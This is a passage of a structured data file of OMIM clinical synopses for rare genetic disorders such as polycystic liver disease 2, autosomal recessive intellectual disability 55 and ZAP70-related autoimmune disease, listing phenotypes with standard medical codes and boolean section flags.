'immunology': '''Immunodeficiency {SNOMEDCT:234532001} {ICD10CM:D84.9} {ICD9CM:279.3} {UMLS C0021051,C4284394 HP:0002721} {HPO HP:0002721 C0021051};\nNeutropenia {SNOMEDCT:303011007,165517008,84828003} {ICD10CM:D70,D70.9,D72.819} {ICD9CM:288.50,288.0,288.00} {UMLS C0027947,C0023530,C0853697 HP:0001882,HP:0001875} {HPO HP:0001875 C0853697};\nIncreased IgE {UMLS C0236175 HP:0003212};\nImpaired NK and T-cell degranulation {UMLS C4314016};\nBone marrow shows hypersegmented neutrophils {UMLS C4314015}''',
'miscellaneous': '''Onset in infancy {UMLS C1848924 HP:0003593} {HPO HP:0003593 C1848924};\nOne patient born of consanguineous Turkish parents has been reported (last curated July 2016) {UMLS C4314013}''',
'molecularBasis': 'Caused by mutation in the adaptor-related protein complex 3, delta-1 subunit gene (AP3D1, {607246.0001})',
'inheritanceExists': True,
'growthExists': False,
'growthHeightExists': False,
'growthWeightExists': False,
'growthOtherExists': False,
'headAndNeckExists': True,
'headAndNeckHeadExists': True,
'headAndNeckFaceExists': True,
'headAndNeckEarsExists': True,
'headAndNeckEyesExists': True,
'headAndNeckNoseExists': False,
'headAndNeckMouthExists': False,
'headAndNeckTeethExists': False,
'headAndNeckNeckExists': False,
'cardiovascularExists': False,
'cardiovascularHeartExists': False,
'cardiovascularVascularExists': False,
'respiratoryExists': True,
'respiratoryNasopharynxExists': False,
'respiratoryLarynxExists': False,
'respiratoryAirwaysExists': False,
'respiratoryLungExists': True,
'chestExists': False,
'chestExternalFeaturesExists': False,
'chestRibsSternumClaviclesAndScapulaeExists': False,
'chestBreastsExists': False,
'chestDiaphragmExists': False,
'abdomenExists': True,
'abdomenExternalFeaturesExists': False,
'abdomenLiverExists': True,
'abdomenPancreasExists': False,
'abdomenBiliaryTractExists': False,
'abdomenSpleenExists': True,
'abdomenGastrointestinalExists': True,
'genitourinaryExists': False,
'genitourinaryExternalGenitaliaMaleExists': False,
'genitourinaryExternalGenitaliaFemaleExists': False,
'genitourinaryInternalGenitaliaMaleExists': False,
'genitourinaryInternalGenitaliaFemaleExists': False,
'genitourinaryKidneysExists': False,
'genitourinaryUretersExists': False,
'genitourinaryBladderExists': False,
'skeletalExists': True,
'skeletalSkullExists': False,
'skeletalSpineExists': False,
'skeletalPelvisExists': True,
'skeletalLimbsExists': False,
'skeletalHandsExists': False,
'skeletalFeetExists': False,
'skinNailsHairExists': True,
'skinNailsHairSkinExists': True,
'skinNailsHairSkinHistologyExists': False,
'skinNailsHairSkinElectronMicroscopyExists': False,
'skinNailsHairNailsExists': False,
'skinNailsHairHairExists': True,
'muscleSoftTissueExists': True,
'neurologicExists': True,
'neurologicCentralNervousSystemExists': True,
'neurologicPeripheralNervousSystemExists': False,
'neurologicBehavioralPsychiatricManifestationsExists': False,
'voiceExists': False,
'metabolicFeaturesExists': False,
'endocrineFeaturesExists': False,
'hematologyExists': False,
'immunologyExists': True,
'neoplasiaExists': False,
'prenatalManifestationsExists': False,
'prenatalManifestationsMovementExists': False,
'prenatalManifestationsAmnioticFluidExists': False,
'prenatalManifestationsPlacentaAndUmbilicalCordExists': False,
'prenatalManifestationsMaternalExists': False,
'prenatalManifestationsDeliveryExists': False,
'laboratoryAbnormalitiesExists': False,
'miscellaneousExists': True,
'molecularBasisExists': True,
'matches': ''
} },
{'clinicalSynopsis': {
'mimNumber': 617004,
'prefix': '#',
'preferredTitle': 'POLYCYSTIC LIVER DISEASE 2 WITH OR WITHOUT KIDNEY CYSTS; PCLD2',
'inheritance': 'Autosomal dominant {SNOMEDCT:263681008} {UMLS C0443147 HP:0000006} {HPO HP:0000006 C0443147}',
'abdomenLiver': '''Liver cysts {SNOMEDCT:85057007} {UMLS C0267834 HP:0001407} {HPO HP:0001407 C0267834};\nHepatomegaly {SNOMEDCT:80515008} {ICD10CM:R16.0} {ICD9CM:789.1} {UMLS C0019209 HP:0002240} {HPO HP:0002240 C0019209}''',
'genitourinaryKidneys': 'Renal cysts, few (in some patients) {UMLS C4692536}',
'miscellaneous': '''Adult onset {UMLS C1853562 HP:0003581} {HPO HP:0003581 C1853562};\nKidney cysts are usually incidental findings and do not cause significant renal disease {UMLS C4693252}''',
'molecularBasis': 'Caused by mutation in the gene encoding the human homolog of S. cerevisiae Sec63 (SEC63, {608648.0001})',
'inheritanceExists': True,
'growthExists': False,
'growthHeightExists': False,
'growthWeightExists': False,
'growthOtherExists': False,
'headAndNeckExists': False,
'headAndNeckHeadExists': False,
'headAndNeckFaceExists': False,
'headAndNeckEarsExists': False,
'headAndNeckEyesExists': False,
'headAndNeckNoseExists': False,
'headAndNeckMouthExists': False,
'headAndNeckTeethExists': False,
'headAndNeckNeckExists': False,
'cardiovascularExists': False,
'cardiovascularHeartExists': False,
'cardiovascularVascularExists': False,
'respiratoryExists': False,
'respiratoryNasopharynxExists': False,
'respiratoryLarynxExists': False,
'respiratoryAirwaysExists': False,
'respiratoryLungExists': False,
'chestExists': False,
'chestExternalFeaturesExists': False,
'chestRibsSternumClaviclesAndScapulaeExists': False,
'chestBreastsExists': False,
'chestDiaphragmExists': False,
'abdomenExists': True,
'abdomenExternalFeaturesExists': False,
'abdomenLiverExists': True,
'abdomenPancreasExists': False,
'abdomenBiliaryTractExists': False,
'abdomenSpleenExists': False,
'abdomenGastrointestinalExists': False,
'genitourinaryExists': True,
'genitourinaryExternalGenitaliaMaleExists': False,
'genitourinaryExternalGenitaliaFemaleExists': False,
'genitourinaryInternalGenitaliaMaleExists': False,
'genitourinaryInternalGenitaliaFemaleExists': False,
'genitourinaryKidneysExists': True,
'genitourinaryUretersExists': False,
'genitourinaryBladderExists': False,
'skeletalExists': False,
'skeletalSkullExists': False,
'skeletalSpineExists': False,
'skeletalPelvisExists': False,
'skeletalLimbsExists': False,
'skeletalHandsExists': False,
'skeletalFeetExists': False,
'skinNailsHairExists': False,
'skinNailsHairSkinExists': False,
'skinNailsHairSkinHistologyExists': False,
'skinNailsHairSkinElectronMicroscopyExists': False,
'skinNailsHairNailsExists': False,
'skinNailsHairHairExists': False,
'muscleSoftTissueExists': False,
'neurologicExists': False,
'neurologicCentralNervousSystemExists': False,
'neurologicPeripheralNervousSystemExists': False,
'neurologicBehavioralPsychiatricManifestationsExists': False,
'voiceExists': False,
'metabolicFeaturesExists': False,
'endocrineFeaturesExists': False,
'hematologyExists': False,
'immunologyExists': False,
'neoplasiaExists': False,
'prenatalManifestationsExists': False,
'prenatalManifestationsMovementExists': False,
'prenatalManifestationsAmnioticFluidExists': False,
'prenatalManifestationsPlacentaAndUmbilicalCordExists': False,
'prenatalManifestationsMaternalExists': False,
'prenatalManifestationsDeliveryExists': False,
'laboratoryAbnormalitiesExists': False,
'miscellaneousExists': True,
'molecularBasisExists': True,
'matches': ''
} },
{'clinicalSynopsis': {
'mimNumber': 617051,
'prefix': '#',
'preferredTitle': 'MENTAL RETARDATION, AUTOSOMAL RECESSIVE 55; MRT55',
'inheritance': 'Autosomal recessive {SNOMEDCT:258211005} {UMLS C0441748 HP:0000007} {HPO HP:0000007 C0441748,C4020899}',
'headAndNeckHead': 'Microcephaly, borderline (-2.1 to -3.3 SD) {UMLS C4314010}',
'headAndNeckFace': 'Coarse facies {UMLS C1845847 HP:0000280} {HPO HP:0000280 C1845847,C4072825}',
'headAndNeckEyes': '''Strabismus {SNOMEDCT:22066006,128602000} {ICD10CM:H50.40,H50.9} {ICD9CM:378.30} {UMLS C2020541,C1423541,C0038379 HP:0032012,HP:0000486} {HPO HP:0000486 C0038379};\nGray sclerae {UMLS C4314009}''',
'skinNailsHairSkin': 'Mongolian spots {SNOMEDCT:40467008} {UMLS C0265985 HP:0100814,HP:0011369}',
'muscleSoftTissue': 'Hypotonia {SNOMEDCT:398152000,398151007} {UMLS C0026827,C1858120 HP:0001290,HP:0001252} {HPO HP:0001290 C1858120}',
'neurologicCentralNervousSystem': '''Global developmental delay {SNOMEDCT:224958001} {ICD10CM:F88} {UMLS C0557874 HP:0001263} {HPO HP:0001263 C0557874,C1864897,C4020875};\nMental retardation, profound {SNOMEDCT:31216003} {ICD10CM:F73} {UMLS C0020796 HP:0002187} {HPO HP:0002187 C0020796,C3161330};\nSeizures, well-controlled (in 1 patient) {UMLS C4314012};\nVentriculomegaly {SNOMEDCT:413808003} {UMLS C1531647,C3278923 HP:0002119} {HPO HP:0002119 C3278923};\nCerebral atrophy {SNOMEDCT:278849000} {UMLS C0235946 HP:0002059} {HPO HP:0002059 C0154671,C0235946,C4020860};\nArachnoid cysts {SNOMEDCT:33595009} {ICD10CM:G93.0} {UMLS C0078981 HP:0100702} {HPO HP:0100702 C0078981};\nDysgenesis of the corpus callosum {UMLS C0431369 HP:0006989};\nT2-weighted signal abnormalities in the subcortical white matter {UMLS C4314011}''',
'miscellaneous': '''Onset in infancy {UMLS C1848924 HP:0003593} {HPO HP:0003593 C1848924};\nOne consanguineous Saudi family has been reported (last curated July 2016) {UMLS C4314007}''',
'molecularBasis': 'Caused by mutation in the pseudouridylate synthase 3 gene (PUS3, {616283.0001})',
'inheritanceExists': True,
'growthExists': False,
'growthHeightExists': False,
'growthWeightExists': False,
'growthOtherExists': False,
'headAndNeckExists': True,
'headAndNeckHeadExists': True,
'headAndNeckFaceExists': True,
'headAndNeckEarsExists': False,
'headAndNeckEyesExists': True,
'headAndNeckNoseExists': False,
'headAndNeckMouthExists': False,
'headAndNeckTeethExists': False,
'headAndNeckNeckExists': False,
'cardiovascularExists': False,
'cardiovascularHeartExists': False,
'cardiovascularVascularExists': False,
'respiratoryExists': False,
'respiratoryNasopharynxExists': False,
'respiratoryLarynxExists': False,
'respiratoryAirwaysExists': False,
'respiratoryLungExists': False,
'chestExists': False,
'chestExternalFeaturesExists': False,
'chestRibsSternumClaviclesAndScapulaeExists': False,
'chestBreastsExists': False,
'chestDiaphragmExists': False,
'abdomenExists': False,
'abdomenExternalFeaturesExists': False,
'abdomenLiverExists': False,
'abdomenPancreasExists': False,
'abdomenBiliaryTractExists': False,
'abdomenSpleenExists': False,
'abdomenGastrointestinalExists': False,
'genitourinaryExists': False,
'genitourinaryExternalGenitaliaMaleExists': False,
'genitourinaryExternalGenitaliaFemaleExists': False,
'genitourinaryInternalGenitaliaMaleExists': False,
'genitourinaryInternalGenitaliaFemaleExists': False,
'genitourinaryKidneysExists': False,
'genitourinaryUretersExists': False,
'genitourinaryBladderExists': False,
'skeletalExists': False,
'skeletalSkullExists': False,
'skeletalSpineExists': False,
'skeletalPelvisExists': False,
'skeletalLimbsExists': False,
'skeletalHandsExists': False,
'skeletalFeetExists': False,
'skinNailsHairExists': True,
'skinNailsHairSkinExists': True,
'skinNailsHairSkinHistologyExists': False,
'skinNailsHairSkinElectronMicroscopyExists': False,
'skinNailsHairNailsExists': False,
'skinNailsHairHairExists': False,
'muscleSoftTissueExists': True,
'neurologicExists': True,
'neurologicCentralNervousSystemExists': True,
'neurologicPeripheralNervousSystemExists': False,
'neurologicBehavioralPsychiatricManifestationsExists': False,
'voiceExists': False,
'metabolicFeaturesExists': False,
'endocrineFeaturesExists': False,
'hematologyExists': False,
'immunologyExists': False,
'neoplasiaExists': False,
'prenatalManifestationsExists': False,
'prenatalManifestationsMovementExists': False,
'prenatalManifestationsAmnioticFluidExists': False,
'prenatalManifestationsPlacentaAndUmbilicalCordExists': False,
'prenatalManifestationsMaternalExists': False,
'prenatalManifestationsDeliveryExists': False,
'laboratoryAbnormalitiesExists': False,
'miscellaneousExists': True,
'molecularBasisExists': True,
'matches': ''
} },
{'clinicalSynopsis': {
'mimNumber': 617006,
'prefix': '#',
'preferredTitle': 'AUTOIMMUNE DISEASE, MULTISYSTEM, INFANTILE-ONSET, 2; ADMIO2',
'inheritance': 'Autosomal recessive {SNOMEDCT:258211005} {UMLS C0441748 HP:0000007} {HPO HP:0000007 C0441748,C4020899}',
'abdomenGastrointestinal': 'Inflammatory colitis {UMLS C4314158}',
'genitourinaryKidneys': '''Nephrotic syndrome (1 patient) {UMLS C4014460} {HPO HP:0000100 C0027726};\nIgG deposition (1 patient) {UMLS C4314161};\nEffacement of podocytes (1 patient) {UMLS C4314160};\nMinimal change disease (1 patient) {UMLS C4314159} {HPO HP:0012579 C0027721};\nProteinuria {SNOMEDCT:29738008,231860006} {ICD10CM:R80,R80.9} {ICD9CM:791.0} {UMLS C4554346,C1279888,C0033687,C1962972 HP:0000093} {HPO HP:0000093 C0033687}''',
'skinNailsHairSkin': '''Blistering skin disease {UMLS C4314154};\nBullous pemphigoid {SNOMEDCT:77090002,86142006} {ICD10CM:L12.0,L12,L12.9} {ICD9CM:694.5} {UMLS C0030805}''',
'endocrineFeatures': 'Autoimmune hypothyroidism (1 patient) {UMLS C4314162}',
'hematology': 'Autoantibodies to factor VIII (1 boy) {UMLS C4314155}',
'immunology': '''Autoimmune disorder {SNOMEDCT:85828009} {ICD10CM:M30-M36} {UMLS C0004364,C4553718 HP:0002960} {HPO HP:0002960 C0004364};\nAutoantibody production {UMLS C4314157};\nDecreased numbers of CD8+ T cells {UMLS C1839305 HP:0005415};\nDiminished proliferative response of T cells {UMLS C4314156}''',
'miscellaneous': '''Onset in infancy {UMLS C1848924 HP:0003593} {HPO HP:0003593 C1848924};\nA brother and sister from 1 family have been reported (last curated June 2016) {UMLS C4314152};\nBoth patients had resolution of symptoms after hematopoietic stem cell transplantation {UMLS C4314151}''',
'molecularBasis': 'Caused by mutation in the zeta-chain-associated protein kinase gene (ZAP70, {176947.0006})',
'inheritanceExists': True,
'growthExists': False,
'growthHeightExists': False,
'growthWeightExists': False,
'growthOtherExists': False,
'headAndNeckExists': False,
'headAndNeckHeadExists': False,
'headAndNeckFaceExists': False,
'headAndNeckEarsExists': False,
'headAndNeckEyesExists': False,
'headAndNeckNoseExists': False,
'headAndNeckMouthExists': False,
'headAndNeckTeethExists': False,
'headAndNeckNeckExists': False,
'cardiovascularExists': False,
'cardiovascularHeartExists': False,
'cardiovascularVascularExists': False,
'respiratoryExists': False,
'respiratoryNasopharynxExists': False,
'respiratoryLarynxExists': False,
'respiratoryAirwaysExists': False,
'respiratoryLungExists': False,
'chestExists': False,
'chestExternalFeaturesExists': False,
'chestRibsSternumClaviclesAndScapulaeExists': False,
'chestBreastsExists': False,
'chestDiaphragmExists': False,
'abdomenExists': True,
'abdomenExternalFeaturesExists': False,
'abdomenLiverExists': False,
'abdomenPancreasExists': False,
'abdomenBiliaryTractExists': False,
'abdomenSpleenExists': False,
'abdomenGastrointestinalExists': True,
'genitourinaryExists': True,
'genitourinaryExternalGenitaliaMaleExists': False,
'genitourinaryExternalGenitaliaFemaleExists': False,
'genitourinaryInternalGenitaliaMaleExists': False,
'genitourinaryInternalGenitaliaFemaleExists': False,
'genitourinaryKidneysExists': True,
'genitourinaryUretersExists': False,
'genitourinaryBladderExists': False,
'skeletalExists': False,
'skeletalSkullExists': False,
'skeletalSpineExists': False,
'skeletalPelvisExists': False,
'skeletalLimbsExists': False,
'skeletalHandsExists': False,
'skeletalFeetExists': False,
'skinNailsHairExists': True,
'skinNailsHairSkinExists': True,
'skinNailsHairSkinHistologyExists': False,
'skinNailsHairSkinElectronMicroscopyExists': False,
'skinNailsHairNailsExists': False,
'skinNailsHairHairExists': False,
'muscleSoftTissueExists': False,
'neurologicExists': False,
'neurologicCentralNervousSystemExists': False,
'neurologicPeripheralNervousSystemExists': False,
'neurologicBehavioralPsychiatricManifestationsExists': False,
'voiceExists': False,
'metabolicFeaturesExists': False,
'endocrineFeaturesExists': True,
'hematologyExists': True,
'immunologyExists': True,
'neoplasiaExists': False,
'prenatalManifestationsExists': False,
'prenatalManifestationsMovementExists': False,
'prenatalManifestationsAmnioticFluidExists': False,
'prenatalManifestationsPlacentaAndUmbilicalCordExists': False,
'prenatalManifestationsMaternalExists': False,
'prenatalManifestationsDeliveryExists': False,
'laboratoryAbnormalitiesExists': False,
'miscellaneousExists': True,
'molecularBasisExists': True,
'matches': ''
} },
{'clinicalSynopsis': {
'mimNumber': 617008,
'prefix': '#',
'preferredTitle': 'CEREBRAL PALSY, SPASTIC QUADRIPLEGIC, 3; CPSQ3',
'inheritance': 'Autosomal recessive {SNOMEDCT:258211005} {UMLS C0441748 HP:0000007} {HPO HP:0000007 C0441748,C4020899}',
'headAndNeckHead': 'Microcephaly, borderline {UMLS C4314148}',
'headAndNeckEyes': '''Nystagmus {SNOMEDCT:563001} {ICD10CM:H55.0,H55.00} {ICD9CM:379.50} {UMLS C1963184,C4554036,C0028738 HP:0000639} {HPO HP:0000639 C0028738};\nStrabismus {SNOMEDCT:22066006,128602000} {ICD10CM:H50.40,H50.9} {ICD9CM:378.30} {UMLS C2020541,C1423541,C0038379 HP:0032012,HP:0000486} {HPO HP:0000486 C0038379};\nSupranuclear gaze palsy {SNOMEDCT:420675003} {UMLS C1720037 HP:0000605} {HPO HP:0000605 C1720037};\nExotropia {SNOMEDCT:399252000,399054005} {ICD10CM:H50.1,H50.10} {ICD9CM:378.1,378.10} {UMLS C0015310 HP:0000577} {HPO HP:0000577 C0015310}''',
'abdomenGastrointestinal': 'Dysphagia {SNOMEDCT:40739000,288939007} {ICD10CM:R13.1,R13.10} {ICD9CM:787.2,787.20} {UMLS C0011168,C1560331 HP:0002015,HP:0200136} {HPO HP:0002015 C0011168}',
'neurologicCentralNervousSystem': '''Global developmental delay {SNOMEDCT:224958001} {ICD10CM:F88} {UMLS C0557874 HP:0001263} {HPO HP:0001263 C0557874,C1864897,C4020875};\nSpastic quadriplegia {SNOMEDCT:192965001} {UMLS C0426970 HP:0002510} {HPO HP:0002510 C0426970};\nSpastic diplegia {SNOMEDCT:281411007} {ICD10CM:G80.1} {UMLS C0023882 HP:0001264} {HPO HP:0001264 C0023882};\nPyramidal tract signs {SNOMEDCT:14648003} {UMLS C0234132 HP:0007256} {HPO HP:0007256 C0234132};\nCognitive impairment {SNOMEDCT:386806002} {UMLS C0338656 HP:0100543} {HPO HP:0100543 C0338656,C0683322};\nPoor speech {UMLS C1848207 HP:0002465} {HPO HP:0002465 C1848207,C4280574};\nSeizures (1 patient) {UMLS C2749200} {HPO HP:0001250 C0014544,C0036572};\nGray matter heterotopia (in 1 patient) {UMLS C4314150} {HPO HP:0002282 C0008519};\nT2-weighted hyperintensities (in 2 patients) {UMLS C4314149}''',
'miscellaneous': '''Onset in infancy {UMLS C1848924 HP:0003593} {HPO HP:0003593 C1848924};\nVariable severity {UMLS C1861403 HP:0003828} {HPO HP:0003828 C1861403,C1866862};\nOne consanguineous Jordanian family with 4 affected sibs has been reported (last curated June 2016) {UMLS C4314146}''',
'molecularBasis': 'Caused by mutation in the adducin 3 gene (ADD3, {601568.0001})',
'inheritanceExists': True,
'growthExists': False,
'growthHeightExists': False,
'growthWeightExists': False,
'growthOtherExists': False,
'headAndNeckExists': True,
'headAndNeckHeadExists': True,
'headAndNeckFaceExists': False,
'headAndNeckEarsExists': False,
'headAndNeckEyesExists': True,
'headAndNeckNoseExists': False,
'headAndNeckMouthExists': False,
'headAndNeckTeethExists': False,
'headAndNeckNeckExists': False,
'cardiovascularExists': False,
'cardiovascularHeartExists': False,
'cardiovascularVascularExists': False,
'respiratoryExists': False,
'respiratoryNasopharynxExists': False,
'respiratoryLarynxExists': False,
'respiratoryAirwaysExists': False,
'respiratoryLungExists': False,
'chestExists': False,
'chestExternalFeaturesExists': False,
'chestRibsSternumClaviclesAndScapulaeExists': False,
'chestBreastsExists': False,
'chestDiaphragmExists': False,
'abdomenExists': True,
'abdomenExternalFeaturesExists': False,
'abdomenLiverExists': False,
'abdomenPancreasExists': False,
'abdomenBiliaryTractExists': False,
'abdomenSpleenExists': False,
'abdomenGastrointestinalExists': True,
'genitourinaryExists': False,
'genitourinaryExternalGenitaliaMaleExists': False,
'genitourinaryExternalGenitaliaFemaleExists': False,
'genitourinaryInternalGenitaliaMaleExists': False,
'genitourinaryInternalGenitaliaFemaleExists': False,
'genitourinaryKidneysExists': False,
'genitourinaryUretersExists': False,
'genitourinaryBladderExists': False,
'skeletalExists': False,
'skeletalSkullExists': False,
'skeletalSpineExists': False,
'skeletalPelvisExists': False,
'skeletalLimbsExists': False,
'skeletalHandsExists': False,
'skeletalFeetExists': False,
'skinNailsHairExists': False,
'skinNailsHairSkinExists': False,
'skinNailsHairSkinHistologyExists': False,
'skinNailsHairSkinElectronMicroscopyExists': False,
'skinNailsHairNailsExists': False,
'skinNailsHairHairExists': False,
'muscleSoftTissueExists': False,
'neurologicExists': True,
'neurologicCentralNervousSystemExists': True,
'neurologicPeripheralNervousSystemExists': False,
'neurologicBehavioralPsychiatricManifestationsExists': False,
'voiceExists': False,
'metabolicFeaturesExists': False,
'endocrineFeaturesExists': False,
'hematologyExists': False,
'immunologyExists': False,
'neoplasiaExists': False,
'prenatalManifestationsExists': False,
'prenatalManifestationsMovementExists': False,
'prenatalManifestationsAmnioticFluidExists': False,
'prenatalManifestationsPlacentaAndUmbilicalCordExists': False,
'prenatalManifestationsMaternalExists': False,
'prenatalManifestationsDeliveryExists': False,
'laboratoryAbnormalitiesExists': False,
'miscellaneousExists': True,
'molecularBasisExists': True,
'matches': ''
} },
{'clinicalSynopsis': {
'mimNumber': 617011,
'prefix': '#',
'preferredTitle': 'MACROCEPHALY, DYSMORPHIC FACIES, AND PSYCHOMOTOR RETARDATION; MDFPMR',
'inheritance': 'Autosomal recessive {SNOMEDCT:258211005} {UMLS C0441748 HP:0000007} {HPO HP:0000007 C0441748,C4020899}',
'growthHeight': 'Tall stature {SNOMEDCT:248328003} {UMLS C0241240 HP:0000098} {HPO HP:0000098 C0241240}',
'growthWeight': 'Increased birth weight {UMLS C2748451}',
'growthOther': '''Somatic overgrowth apparent since birth {UMLS C4314143};\nAsthenic habitus as adult {UMLS C4314142}''',
'headAndNeckHead': 'Macrocephaly {SNOMEDCT:19410003,12138000} {ICD10CM:Q75.3} {UMLS C2243051,C0221355 HP:0001355,HP:0000256} {HPO HP:0000256 C4083076,C4255213,C4280663,C4280664} {EOM ID:1d53660e657259f0 IMG:Macrocephaly-small.jpg}',
'headAndNeckFace': '''Prominent forehead {UMLS C1837260 HP:0011220} {HPO HP:0011220 C1837260,C1867446} {EOM ID:510a51e4083c1d6f IMG:Forehead,Prominent-small.jpg};\nFrontal bossing {SNOMEDCT:90145001} {UMLS C0221354 HP:0002007} {HPO HP:0002007 C0221354} {EOM ID:a223995bdef3e8d6 IMG:Frontal_Bossing-small.jpg};\nLong face {UMLS C1836047 HP:0000276} {HPO HP:0000276 C1836047} {EOM ID:811c4c37ac5a130b IMG:Face,Long-small.jpg};\nHypotonic face {UMLS C3808179};\nTriangular face {UMLS C1835884 HP:0000325} {HPO HP:0000325 C1835884} {EOM ID:6f437512a502776b IMG:Face,Triangular-small.jpg};\nMalar hypoplasia {UMLS C1858085 HP:0000272} {HPO HP:0000272 C1858085,C4280651} {EOM ID:81db216382f501fc IMG:Malar_Flattening-small.jpg};\nPrognathism {SNOMEDCT:22810007,72855002,109504005} {ICD10CM:M26.213} {ICD9CM:524.23} {UMLS C0033324,C0399526 HP:0000303} {HPO HP:0000303 C0302501,C0399526,C2227134,C4280644,C4280645} {EOM ID:cf3eb35245d52feb IMG:Prognathism-small.jpg}''',
'headAndNeckEars': '''Macrotia {SNOMEDCT:69056000} {ICD10CM:Q17.1} {ICD9CM:744.22} {UMLS C0152421 HP:0000400} {HPO HP:0000400 C0152421,C0554972,C1835581,C1848570,C1850189,C1855062,C1860838};\nLarge ears {SNOMEDCT:275480001} {UMLS C0554972 HP:0000400} {HPO HP:0000400 C0152421,C0554972,C1835581,C1848570,C1850189,C1855062,C1860838};\nLow-set ears {SNOMEDCT:95515009} {ICD10CM:Q17.4} {UMLS C0239234 HP:0000369} {HPO HP:0000369 C0239234};\nPosteriorly rotated ears {SNOMEDCT:253251006} {UMLS C0431478 HP:0000358} {HPO HP:0000358 C0431478}''',
'headAndNeckEyes': '''Hypertelorism {SNOMEDCT:22006008} {ICD10CM:Q75.2} {ICD9CM:376.41} {UMLS C0020534 HP:0000316} {HPO HP:0000316 C0020534} {EOM ID:71d9f1be67c7f8b6 IMG:Eyes,Widely_Spaced-small.jpg};\nDownslanting palpebral fissures {SNOMEDCT:246800008} {UMLS C0423110 HP:0000494} {HPO HP:0000494 C0423110};\nUpslanting palpebral fissures {SNOMEDCT:246799009} {UMLS C0423109 HP:0000582} {HPO HP:0000582 C0423109};\nProptosis {SNOMEDCT:18265008} {ICD10CM:H05.20} {ICD9CM:376.30} {UMLS C0015300 HP:0000520} {HPO HP:0000520 C0015300,C1837760,C1848490,C1862425} {EOM ID:765f49f1e824f0d2 IMG:Proptosis-small.jpg};\nSparse eyebrows {SNOMEDCT:422441003} {UMLS C0578682,C1832446 HP:0045075,HP:0002223} {HPO HP:0045075}''',
'headAndNeckNose': 'Prominent nasal bridge {UMLS C1854113 HP:0000426} {HPO HP:0000426 C1854113,C4230640} {EOM ID:a7571049e570041c IMG:Nasal_Bridge,Prominent-small.jpg}',
'headAndNeckMouth': 'High-arched palate {SNOMEDCT:27272007} {ICD10CM:Q38.5} {UMLS C0240635 HP:0000218} {HPO HP:0000218 C0240635}',
'headAndNeckNeck': 'Long neck {UMLS C1839816 HP:0000472} {HPO HP:0000472 C1839816} {EOM ID:7c963baf8e0fd48f IMG:Neck,Long-small.jpg}',
'chestExternalFeatures': 'Asymmetric thorax {UMLS C4539568}',
'skeletal': '''Normal bone age {SNOMEDCT:123981005} {UMLS C1276343};\nJoint laxity {SNOMEDCT:298203008} {UMLS C0086437 HP:0001388} {HPO HP:0001388 C0086437,C0158359};\nJoint limitation {UMLS C1842225}''',
'skeletalSpine': '''Kyphosis {SNOMEDCT:71311003,413428007,414564002} {ICD10CM:M40.20,Q76.41} {ICD9CM:737.1} {UMLS C0022822,C0022821,C2115817,C0265673,C4552747 HP:0002808} {HPO HP:0002808 C0022821,C1845112};\nScoliosis {SNOMEDCT:298382003,20944008,111266001} {ICD10CM:Q67.5,M41,M41.9} {UMLS C0559260,C0036439,C4552773,C0700208 HP:0002650} {HPO HP:0002650 C0037932,C0700208};\nLordosis {SNOMEDCT:249710008,61960001} {ICD10CM:M40.5} {UMLS C4554632,C0024003,C0599412 HP:0003307} {HPO HP:0003307 C0024003}''',
'skeletalLimbs': 'Elongated limbs {UMLS C4314141}',
'skeletalHands': '''Large hands {SNOMEDCT:249752003} {UMLS C0426870 HP:0001176} {HPO HP:0001176 C0426870};\nArachnodactyly {SNOMEDCT:62250003} {UMLS C0003706 HP:0001519,HP:0001166} {HPO HP:0001166 C0003706}''',
'skeletalFeet': '''Large feet {SNOMEDCT:299462005} {UMLS C0576225 HP:0001833} {HPO HP:0001833 C0576225};\nFlat feet {SNOMEDCT:53226007,203534009} {ICD10CM:M21.4} {ICD9CM:734} {UMLS C0016202,C0264133 HP:0001763} {HPO HP:0001763 C0016202,C0264133}''',
'muscleSoftTissue': 'Hypotonia {SNOMEDCT:398152000,398151007} {UMLS C0026827,C1858120 HP:0001290,HP:0001252} {HPO HP:0001290 C1858120}',
'neurologicCentralNervousSystem': '''Global developmental delay {SNOMEDCT:224958001} {ICD10CM:F88} {UMLS C0557874 HP:0001263} {HPO HP:0001263 C0557874,C1864897,C4020875};\nIntellectual disability {SNOMEDCT:110359009,228156007} {ICD9CM:317-319.99} {UMLS C3714756 HP:0001249} {HPO HP:0001249 C0025362,C0423903,C0917816,C1843367,C3714756,C4020876};\nPoor or absent speech {UMLS C3278212};\nAtaxic gait {SNOMEDCT:25136009} {ICD10CM:R26.0} {UMLS C0751837 HP:0002066} {HPO HP:0002066 C0751837};\nSeizures (in some patients) {UMLS C2749939} {HPO HP:0001250 C0014544,C0036572};\nVentriculomegaly {SNOMEDCT:413808003} {UMLS C1531647,C3278923 HP:0002119} {HPO HP:0002119 C3278923};\nHydrocephalus (in some patients) {UMLS C3550614} {HPO HP:0000238 C0020255};\nMegalencephaly {SNOMEDCT:19410003,9740002} {ICD10CM:Q75.3,Q04.5} {UMLS C2720434,C0221355 HP:0001355} {HPO HP:0001355 C0221355};\nCortical atrophy (in some patients) {UMLS C4012272} {HPO HP:0002120 C0235946};\nCerebellar atrophy (1 patient) {UMLS C3552260} {HPO HP:0001272 C0262404,C0740279,C4020873};\nThick corpus callosum (1 patient) {UMLS C4314145} {HPO HP:0007074 C1835194};\nEnlarged white matter (1 patient) {UMLS C4314144}''',
'neurologicBehavioralPsychiatricManifestations': 'Poor social interaction {SNOMEDCT:88598008} {ICD10CM:F80.82} {UMLS C0150080 HP:0000735}',
'miscellaneous': 'Onset at birth {UMLS C1836142 HP:0003577} {HPO HP:0003577 C1836142,C2752013}',
'molecularBasis': 'Caused by mutation in the HECT domain and RCC1-like domain 1 gene (HERC1, {605109.0001})',
'inheritanceExists': True,
'growthExists': True,
'growthHeightExists': True,
'growthWeightExists': True,
'growthOtherExists': True,
'headAndNeckExists': True,
'headAndNeckHeadExists': True,
'headAndNeckFaceExists': True,
'headAndNeckEarsExists': True,
'headAndNeckEyesExists': True,
'headAndNeckNoseExists': True,
'headAndNeckMouthExists': True,
'headAndNeckTeethExists': False,
'headAndNeckNeckExists': True,
'cardiovascularExists': False,
'cardiovascularHeartExists': False,
'cardiovascularVascularExists': False,
'respiratoryExists': False,
'respiratoryNasopharynxExists': False,
'respiratoryLarynxExists': False,
'respiratoryAirwaysExists': False,
'respiratoryLungExists': False,
'chestExists': True,
'chestExternalFeaturesExists': True,
'chestRibsSternumClaviclesAndScapulaeExists': False,
'chestBreastsExists': False,
'chestDiaphragmExists': False,
'abdomenExists': False,
'abdomenExternalFeaturesExists': False,
'abdomenLiverExists': False,
'abdomenPancreasExists': False,
'abdomenBiliaryTractExists': False,
'abdomenSpleenExists': False,
